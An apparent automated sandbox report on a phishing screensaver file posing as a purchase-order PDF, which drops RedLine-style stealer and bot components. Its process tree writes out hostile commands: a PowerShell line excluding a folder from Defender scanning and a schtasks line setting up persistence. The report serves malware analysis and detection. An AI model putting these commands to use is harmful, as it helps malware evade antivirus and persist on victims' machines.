Source: Acrobat.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: appvcleaner.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVShNotify.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: IntegratedOffice.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MavInject32.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: elevation_service.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: elevation_service.exe0.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: maintenanceservice.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: msdtc.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: msiexec.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: javaws.exe0.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jjs.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jp2launcher.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: Native_Redline_BTC.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Native_Redline_BTC.exe.4.dr, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
                            Source: 4.2.svchost.exe.6000000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
                            Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@49/171@148/22
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,3_2_00464422
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,3_2_004364AA
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
                            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,4_2_04AFCBD0
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Roaming\97dd988331e417df.bin
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Mutant created: NULL
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                            Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-97dd988331e417df73779169-b
                            Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-97dd988331e417df-inf
                            Source: C:\Windows\System32\alg.exe | Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-97dd988331e417df9ea72c54-b
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | File created: C:\Users\user\AppData\Local\Temp\wainage
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | File read: C:\Users\desktop.ini
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: build.exe, 00000007.00000002.2559158756.00000000035E6000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.0000000003553000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.000000000353D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000007.00000002.2559158756.00000000034C0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | ReversingLabs: Detection: 31%
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Virustotal: Detection: 34%
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | File read: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                            Source: C:\Windows\SysWOW64\svchost.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
                            Source: unknown | Process created: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Process created: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"
                            Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe"
                            Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                            Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f
                            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD5D5.tmp.cmd""
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
                            Source: unknown | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                            Source: unknown | Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknown | Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                            Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                            Source: unknown | Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                            Source: unknown | Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                            Source: unknown | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                            Source: unknown | Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                            Source: unknown | Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                            Source: unknown | Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                            Source: unknown | Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                            Source: unknown | Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                            Source: unknown | Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                            Source: unknown | Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
                            Source: unknown | Process created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
                            Source: unknown | Process created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
                            Source: unknown | Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                            Source: unknown | Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Section loaded: apphelp.dll
